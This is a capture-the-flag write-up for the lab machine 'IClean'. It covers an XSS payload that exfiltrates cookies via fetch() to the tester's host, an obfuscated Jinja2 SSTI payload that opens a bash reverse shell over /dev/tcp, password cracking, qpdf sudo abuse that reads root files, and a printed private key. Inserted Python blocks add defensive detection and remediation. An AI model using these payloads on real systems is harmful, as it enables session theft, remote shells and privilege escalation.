IClean (Linux · Medium)

SSTI + qpdf

Enumeration

nmap

nmap -A -v -T4 10.10.11.12

Nmap scan report for capiclean.htb (10.10.11.12)
Host is up (0.28s latency).
Not shown: 976 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 2c:f9:07:77:e3:f1:3a:36:db:f2:3b:94:e3:b7:cf:b2 (ECDSA)
|_ 256 4a:91:9f:f2:74:c0:41:81:52:4d:f1:ff:2d:01:78:6b (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 59A6DBEA095D69E461CAC2D85CE6999A
| http-methods:
|_ Supported Methods: HEAD OPTIONS GET
|_http-title: Capiclean
| http-server-header:
| Apache/2.4.52 (Ubuntu)
|_ Werkzeug/2.3.7 Python/3.10.12
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Visiting 10.10.11.12 redirects to capiclean.htb, so add it to the hosts file

echo "10.10.11.12 capiclean.htb" | sudo tee -a /etc/hosts

gobuster

gobuster vhost -u http://capiclean.htb/ --append-domain -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Nothing

dirsearch

dirsearch -u capiclean.htb
/login
/quote
/dashboard 302

capiclean.htb/quote


Capturing the request shows that the request path has become /sendMessage


Testing its parameters, XSS eventually succeeds

<img src=x onerror=fetch("http://10.10.16.38:8000/"+document.cookie);>

# urlencode
service=<img+src%3dx+onerror%3dfetch("http%3a//10.10.16.38:8000/"%2bdocument.cookie)%3b>

# payload
<img+src%3dx+onerror%3dfetch("http%3a//10.10.16.38:8000/"%2bdocument.cookie)%3b>&email=aaaaaa%40aa.a

python3 -m http.server

Received:

session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZqfzSw.KpFwmEyKO76EyEMzWmsW-mWq_XA

Add the cookie and visit /dashboard
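The captured session cookie is a Flask signed cookie, and its contents can be read without the application's secret key: only the signature depends on it. The Python below is an added example (not code from the write-up or from the application) that splits the cookie shown above into payload, timestamp and signature. The observation that the role value equals the unsalted MD5 of the word admin comes from computing that digest here, not from the page.

```python
import base64
import hashlib
import json
import time

# Session cookie value exactly as captured in the write-up above (from the page).
COOKIE = ("eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ"
          ".ZqfzSw.KpFwmEyKO76EyEMzWmsW-mWq_XA")


def _b64(segment: str) -> bytes:
    # itsdangerous (Flask's signer) writes URL-safe base64 with '=' padding stripped.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def inspect_flask_session(cookie: str) -> dict:
    """Split a Flask session cookie into its three parts.

    Flask sessions are signed (TimestampSigner) but not encrypted, so anyone
    holding the cookie can read the JSON payload. Changing it is not possible
    without SECRET_KEY, but nothing in it is private to the server.
    """
    if cookie.startswith("."):
        raise ValueError("zlib-compressed payload; not handled in this example")
    payload_b64, ts_b64, sig_b64 = cookie.split(".")
    issued = int.from_bytes(_b64(ts_b64), "big")      # seconds since the epoch
    return {
        "payload": json.loads(_b64(payload_b64)),
        "issued_at": issued,
        "issued_at_utc": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(issued)),
        "signature_bytes": len(_b64(sig_b64)),       # 20 => HMAC-SHA1, Flask's default
    }


def is_md5_of(hexdigest: str, word: str) -> bool:
    """True when hexdigest is the plain, unsalted MD5 of word."""
    return hashlib.md5(word.encode()).hexdigest() == hexdigest.lower()


if __name__ == "__main__":
    info = inspect_flask_session(COOKIE)
    print(json.dumps(info, indent=2))
    print("role is md5('admin'):", is_md5_of(info["payload"]["role"], "admin"))
```

Because the role check is carried client-side as a recognisable hash, the whole privilege model is visible to whoever holds the cookie. Storing an opaque session identifier and keeping the role lookup server-side removes that information from the cookie entirely.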


/InvoiceGenerator: after filling in the parameters it returns an "Invoice ID generated" message; testing its parameters leads nowhere


/QRGenerator: after clicking Generate QR the input box below appears; test all of its fields


Shell

Testing qr_link reveals SSTI


payload:

{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("bash+-c+'/bin/bash+-i+>%26+/dev/tcp/10.10.16.38/4444+0>%261'")|attr("read")()}}
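From the defender's side, a payload like the one above is easy to recognise once request parameters are decoded. The Python below is an added example (not code from the write-up or from the application) that scans a form body for Jinja2 delimiters and for the introspection names the payload chains through, after undoing URL encoding and the `\x5f` hex escapes the payload uses in place of underscores. The sample bodies are constructed here; the third one is the page's payload cut after its first few filters.

```python
import re
from urllib.parse import parse_qs

# Jinja2 statement/expression delimiters.
TEMPLATE_DELIMS = re.compile(r"\{\{|\{%|\}\}|%\}")
# Names and filters the page's payload uses to reach os.popen; matched on the
# de-escaped value, so hex-escaped underscores do not hide __globals__ etc.
INTROSPECTION = re.compile(
    r"__(?:globals|builtins|import|class|subclasses|getitem|mro)__"
    r"|\|\s*attr\s*\(|popen\s*\(|/dev/tcp/"
)


def normalise(value: str) -> str:
    """Undo string escapes that survive inside a quoted filter argument."""
    value = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), value)
    value = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), value)
    return value


def classify_field(name: str, value: str) -> list[str]:
    """Return findings for one already URL-decoded form field."""
    text = normalise(value)
    findings = []
    if TEMPLATE_DELIMS.search(text):
        findings.append(f"{name}: template delimiters")
    if INTROSPECTION.search(text):
        findings.append(f"{name}: python introspection / os access")
    return findings


def scan_request_body(body: str) -> list[str]:
    """parse_qs does the percent/plus decoding; each value is then classified."""
    findings = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            findings.extend(classify_field(name, value))
    return findings


# Constructed sample bodies (not captured traffic).
SAMPLES = {
    "benign": "qr_link=https%3A%2F%2Fcapiclean.htb%2Fqr%2F42&email=a%40b.c",
    "probe": "qr_link=%7B%7B7*7%7D%7D",
    "page_payload": (
        'qr_link={{request|attr("application")|attr("\\x5f\\x5fglobals\\x5f\\x5f")'
        '|attr("\\x5f\\x5fgetitem\\x5f\\x5f")("\\x5f\\x5fbuiltins\\x5f\\x5f")}}'
    ),
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, "->", scan_request_body(body) or "clean")
```

Matching like this is a compensating control for logging and alerting, not a fix: the underlying defect is user input ending up in the template source (typically a string built from `qr_link` and handed to `render_template_string`) instead of being passed to the template as a variable, where Jinja2 treats it as data.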

app.py holds the database credentials:

iclean:pxCsmnGLckUb


If the shell is not interactive, the -e option can be used instead

mysql -uiclean -ppxCsmnGLckUb -e 'show databases;'

Find the users that have a bash shell


hash-identifier


hashcat

hashcat -m 1400 -a 0 0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa  /usr/share/wordlists/rockyou.txt

0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa:simple and clean
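The crack is instant because mode 1400 is a single unsalted SHA-256: every candidate costs one hash, and identical passwords produce identical digests for every user. The Python below is an added example (not code from the write-up or from the application) that reproduces that check against the hash and plaintext reported above, next to a salted, iterated PBKDF2 store-and-verify routine from the standard library.

```python
import hashlib
import hmac
import os

# Hash and plaintext exactly as hashcat reported them above (from the page).
PAGE_HASH = "0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa"
PAGE_PASSWORD = "simple and clean"


def raw_sha256_matches(password: str, hexdigest: str) -> bool:
    """What hashcat -m 1400 does per candidate: one SHA-256, no salt, no work factor."""
    digest = hashlib.sha256(password.encode()).hexdigest()
    return hmac.compare_digest(digest, hexdigest.lower())


def hash_password(password: str, iterations: int = 600_000) -> str:
    """Salted, iterated PBKDF2-HMAC-SHA256 (stdlib only; argon2id or bcrypt are
    preferable when a library is available). Format: algo$iters$salt$dk."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    try:
        algo, iterations, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("raw sha256 matches page hash:", raw_sha256_matches(PAGE_PASSWORD, PAGE_HASH))
    stored = hash_password(PAGE_PASSWORD)
    print("stored:", stored)
    print("verify ok:", verify_password(PAGE_PASSWORD, stored))
```

With a random per-user salt the same password never yields the same stored value twice, so a wordlist has to be re-run per account, and the iteration count sets a tunable cost per guess that a raw SHA-256 does not have.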

Now ssh can be used to connect

Privilege escalation


https://qpdf.readthedocs.io/en/stable/cli.htm

Read the flag

sudo /usr/bin/qpdf --empty /tmp/root.txt --qdf --add-attachment /root/root.txt --

cat /tmp/root.txt

Root can also be reached over ssh

sudo /usr/bin/qpdf --empty /tmp/rsa.txt --qdf --add-attachment /root/.ssh/id_rsa --
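The two commands above work because the sudo rule allows qpdf with any arguments, and `--add-attachment` embeds whatever file root can read into the output. The Python below is an added example (not code from the write-up or from the box) of the audit a defender would run over sudoers: it parses each rule, strips the tags, and flags file-handling binaries that may be run as root with unrestricted or wildcard arguments. The sudoers excerpt is constructed (the box's real rule is only shown in a screenshot), and the set of risky binaries is a starting point, not an exhaustive list.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# user/group  host = (runas) [tags:] command[, command...]
RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
        "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT",
        "FOLLOW", "NOFOLLOW", "MAIL", "NOMAIL", "INTERCEPT", "NOINTERCEPT"}

# Binaries that read or write arbitrary paths when given free arguments as root.
# qpdf is the page's case; the others are assumptions for the example.
FILE_ACCESS_BINARIES = {"/usr/bin/qpdf", "/usr/bin/rsync", "/usr/bin/tar",
                        "/usr/bin/cp", "/usr/bin/less", "/usr/bin/vim"}

# Constructed sudoers excerpt (not the box's real file).
SUDOERS_SAMPLE = """\
Defaults env_reset
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
consuela ALL=(ALL) NOPASSWD: /usr/bin/qpdf
backup   ALL=(root) /usr/bin/rsync
deploy   ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart app.service
"""


@dataclass
class Finding:
    who: str
    command: str
    reason: str


def parse_command_spec(spec: str) -> tuple[list[str], str]:
    """Split 'NOPASSWD: /usr/bin/qpdf' into (['NOPASSWD'], '/usr/bin/qpdf')."""
    tags, rest = [], spec.strip()
    while True:
        head, sep, tail = rest.partition(":")
        if sep and head.strip().upper() in TAGS:
            tags.append(head.strip().upper())
            rest = tail.strip()
        else:
            return tags, rest


def audit_sudoers(text: str, risky: set[str]) -> list[Finding]:
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE.match(line)
        if not m:
            continue
        who = m["who"]
        for spec in m["cmds"].split(","):
            tags, cmd = parse_command_spec(spec)
            if cmd == "ALL":
                if who != "root":  # root having ALL is expected; anyone else is worth a look
                    findings.append(Finding(who, cmd, "full root (ALL)"))
                continue
            binary, *args = cmd.split()
            # No arguments in the rule means sudo accepts any arguments.
            if binary in risky and (not args or any("*" in a for a in args)):
                findings.append(Finding(who, cmd, "file read/write as root with unrestricted arguments"))
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SUDOERS_SAMPLE, FILE_ACCESS_BINARIES):
        print(f"{f.who:10} {f.command:45} {f.reason}")
```

The rule with fixed arguments (`/usr/bin/systemctl restart app.service`) is left alone because sudo only matches that exact argument list. For a tool like qpdf there is no argument filter that keeps `--add-attachment` and similar options out of reach, so the remediation is to drop the rule rather than narrow it.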

Write it to a file named id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS
1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQQMb6Wn/o1SBLJUpiVfUaxWHAE64hBN
vX1ZjgJ9wc9nfjEqFS+jAtTyEljTqB+DjJLtRfP4N40SdoZ9yvekRQDRAAAAqGOKt0ljir
dJAAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAxvpaf+jVIEslSm
JV9RrFYcATriEE29fVmOAn3Bz2d+MSoVL6MC1PISWNOoH4OMku1F8/g3jRJ2hn3K96RFAN
EAAAAgK2QvEb+leR18iSesuyvCZCW1mI+YDL7sqwb+XMiIE/4AAAALcm9vdEBpY2xlYW4B
AgMEBQ==
-----END OPENSSH PRIVATE KEY-----

Set the permissions and connect

chmod 600 id_rsa
ssh -i id_rsa root@10.10.11.12